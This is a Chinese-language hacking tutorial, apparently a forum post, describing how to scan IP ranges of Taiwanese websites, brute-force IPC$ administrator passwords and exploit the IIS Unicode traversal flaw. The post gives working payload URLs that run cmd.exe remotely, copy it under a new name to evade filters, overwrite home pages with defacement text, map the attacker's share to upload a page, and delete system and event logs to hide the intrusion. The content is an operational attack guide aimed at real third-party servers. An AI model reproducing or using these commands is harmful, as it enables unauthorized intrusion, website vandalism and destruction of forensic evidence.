作者：银次

    今天上网实在没有事做。而且以前学的技术都没有实践过。现在正好小试身手。
嘿嘿。。    先说明我的工具：
1.  操作系统：Windows 2000 professional
2.  黑软：（1）Superscan 3.0   （2）流光4
步骤：
先到http://www.yahoo.com.cn/找点台湾的网站。然后把网址填到Superscan“查找主机”下面，点查找。得出了该网站的IP，然后把起始IP的最后那个改为“1”，把结束IP改为“255”（要玩就彻底点。把整个IP段都扫描了）在“端口列表设置”那里选上“21”“23”“80”“139”端口，要打够才行哦。为什么呢？开了21端口可以用FTP命令，开了23端口可以用telnet命令开了80端口可以知道它有HTTP服务。开了139端口可以用流光扫描IPC。明白了吗？找到了一台开了这几个端口的主机。开了这么多的端口的话，那么入侵的方法就相对多一点。先把这台主机的IP记下来。好，现在开始打开流光4。
我要分几种情况说：
一。这种情况在Windows 2000里才行得通，因为Windows98不支持IPC探测，在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”，
再选“扫描POP3/FTP/NT/SQL主机”或按“CTRL+R”也可以。然后在“开始地址”和“结束地址”里输入刚才在Superscan里的那个IP段。在扫描
主机类型那里选择“NT/98”，恩，开始吧。扫描出结果以后，“IPC$主机”，选中按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测”
的窗体，把那两个选项都选了，这样效率可以大大提高，然后点“选项”建议把“最多列出XX个用户”改为10个，记住。在用户名后有(admin)的才
是我们要的，然后点“确定”出来后点“是”就开始探测了。一会儿，结果出来了。从现在起打比方，我们探测出了用户名为“root”的管理员，密
码为“1234”，这就好办了，现在可以做什么呢？当然是改网页啦。要会用DOS的命令才可以的哦，在命令提示符里(也就是DOS状态下)，退到根目录
直接输入“CD\”回车就好，然后到重点了哟，输入:
net use \\ip\ipc$ "1234" /uesr:"root"   回车，等一下，就会出现“命令成功完成”。现在你就是那台机子的主人啦。然后输入“dir \\ip\c$\*.*”
如果运气好的话可以看到C:下所有内容。哟。。。看到了inetpub这个目录。

那就再重复dir那个命令。输入“dir \\ip\c$\inetpub\*.*”如果运气还是好的话又可以看到wwwroot这个目录，这一般都是放主页的目录了，如果管理员聪明的话，也许就不在这里了，那就另当别论，再输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或default.asp.那么。这就是主页文件了，假如你事先做好的黑页在C:下，就直接输入"copy 主页文件 \\ip\c$\inetpub\wwwroot"覆盖原文件就OK了，不信可以在IE中输入这个IP你看看是不是你熟悉的黑页？
　
二。如果你是Windows 98或没有探测出密码怎么办呢？现在是第二种方法，在流光的菜单中选“高级扫描工具”或直接按“CTRL+A”在“起始地址”和
“结束地址”那里填如刚才的IP段。其他的选项一般不用改变。点“确定”就开始扫描了。这个功能可多了。能扫描出密码。还可以扫描漏洞。如果你在那里IP填的是1-255，那时间会相对久一点。几分钟过后。出现结果。选择要查看检测报告。现在又是假设啦。在主机111.111.111.111找到*.IDQ和*.IDQ漏洞，还有时髦的Unicode漏洞，然后在IE里输入111.111.111.111/i.ida回车就可以知道它的网页文件存放在哪个目录。如果不显示目录的话。那么就利用Unicode漏洞找出网页文件的目录所在地，复制流光报告里的任意一个/scripts/语句在浏览器中的IP后面，就是这样：
http://111.111.111.111/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
这样就可以看到目标主机C盘的所有文件了。想知道网页文件在哪吗？在IE中输入http://111.111.111.111/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+set
你就会看到：
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP
headers. The headers it did return are:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=100.100.100.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)

HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=100.100.100.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
倒数第4行的“PATH_TRANSLATED=c:\inetpub\wwwroot”就是网页文件存放的地方。
好，开始了，首先把CMD.EXE复制到c:\inetpub\scripts目录，并改名为aaa.exe
如果没有scripts目录呢，可以自己建一个，方法是在IE中输入：
http://111.111.111.111/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+md
+c:\inetpub\scripts
这样就建立了这个目录。现在首先把CMD.EXE复制到c:\inetpub\scripts目录，
并改名为aaa.exe，在IE中输入：
http://111.111.111.111/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy
+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\aaa.exe
这样做的目的是为了避免系统对特殊字符的检测.比如format   del   等，
然后我们又在IE中输入：
http://111.111.111.111/scripts/aaa.exe?/c+dir+c:\inetpub\wwwroot
看看是不是有index.htm或index.asp或default.htm或default.asp文件。
有时会有index.htm和index.asp或default.htm和default.asp都同时存在
那么我们就改两个，直接在IE中输入：http://111.111.111.111/scripts/
aaa.exe?/c+echo+"对不起，你被黑了！哈哈！"+>+c:\inetpub\wwwroot\
index.htm(asp) 或者
http://111.111.111.111/scripts/
aaa.exe?/c+echo+"对不起，你被黑了！哈哈！"+>+c:\inetpub\wwwroot\
default.htm(asp)
这样就全面改写了网页的内容。还有一种方法，如果在“>”号后面再加一个“>”。那么只是在网页最后显示“对不起，你被黑了！哈哈！”
你也许要问“我想把我的黑页放上去行吗？”回答是肯定的，接着看，在本地硬盘建立个共享文件夹aaa,把你的黑页复制进去。把CMD.EXE照样
拷贝到c:\inetpub\scripts,名字为aaa.exe，继续在IE中输入：
http://111.111.111.111/scripts/aaa.exe?/c+net+use+t:+\\你的IP\aaa
这句的意思是映射本地的aaa目录为目标的t:然后继续输入：
http://111.111.111.111/scripts/aaa.exe?/c+copy+t:\index.htm(asp)
+c:\inetpub\wwwroot\
这句的意思是把t:(也就是放有黑页的目录）里的index.htm(asp)复制到
目标主机的网页目录去。覆盖对方的index.htm(asp)文件，别急，还有
http://111.111.111.111/scripts/aaa.exe?/c+net+use+t:+/delete+/yes
这句话的意思是断开映射，这算完了，但大家要养成销毁蛛丝马迹的习惯，把日志删了。方法是在IE中输入：（省去IP）
/scripts/aaa.exe?/c+del+C:\winnt\system32\logfiles\*.*
/scripts/aaa.exe?/c+del+C:\winnt\system32\config\*.evt
/scripts/aaa.exe?/c+del+C:\winnt\system32\dtclog\*.*
/scripts/aaa.exe?/c+del+C:\winnt\system32\*.log
/scripts/aaa.exe?/c+del+C:\winnt\system32\*.txt
/scripts/aaa.exe?/c+del+C:\winnt\*.txt
/scripts/aaa.exe?/c+del+C:\winnt\*.log
删除日志的时候通常不会太快，请耐心等候。
　
三。如果没有Unicode漏洞怎么办？还有一种方法，就是FTP，有时会得到FTP密码，这样也可以哦，但我没有试过，先FTP上主机，
那么就可以输入“DIR”或“LS”，两个都是看文件，但LS要存成文件如果你看到了上面所说的网页文件，那就太好了。比如它是index.htm
我们就输入：put index.htm就可以了。
　
如果没有探测出任何密码或没有Unicode漏洞怎么办？我会说：“不如你来告诉我？”我不知道了。呵呵。换台机子吧。我也不会了。因为---------
我也是菜鸟啊！我再说一下。我用的是第2种方法。有什么不对的请高手指出因为这是我第一次写得象样的文章，请多多指教！